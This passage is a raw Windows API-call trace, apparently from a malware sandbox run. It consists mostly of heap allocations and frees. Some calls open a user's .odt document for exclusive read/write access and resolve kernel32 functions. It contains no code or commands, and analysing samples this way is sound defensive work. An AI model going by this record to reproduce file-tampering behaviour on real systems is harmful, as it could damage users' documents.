hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.932] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\ssq5t5u.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0172.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0172.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0172.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0172.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0172.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0172.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=68, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x88) returned 0x8feba8 [0172.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=68, lpWideCharStr=0x8feba8, cchWideChar=68 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.odt") returned 68 [0172.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0172.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0172.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0172.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0172.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0172.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.936] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0172.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0172.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.938] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0172.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0172.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0172.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0172.938] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0172.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0172.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.939] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0172.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.940] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0172.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bda50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0172.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.941] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0172.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0172.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0172.941] CloseHandle (hObject=0x120) returned 1 [0172.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0172.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0172.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0172.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.941] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.942] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0172.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0172.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0172.942] PeekMessageW (in: lpMsg=0x87f81c, 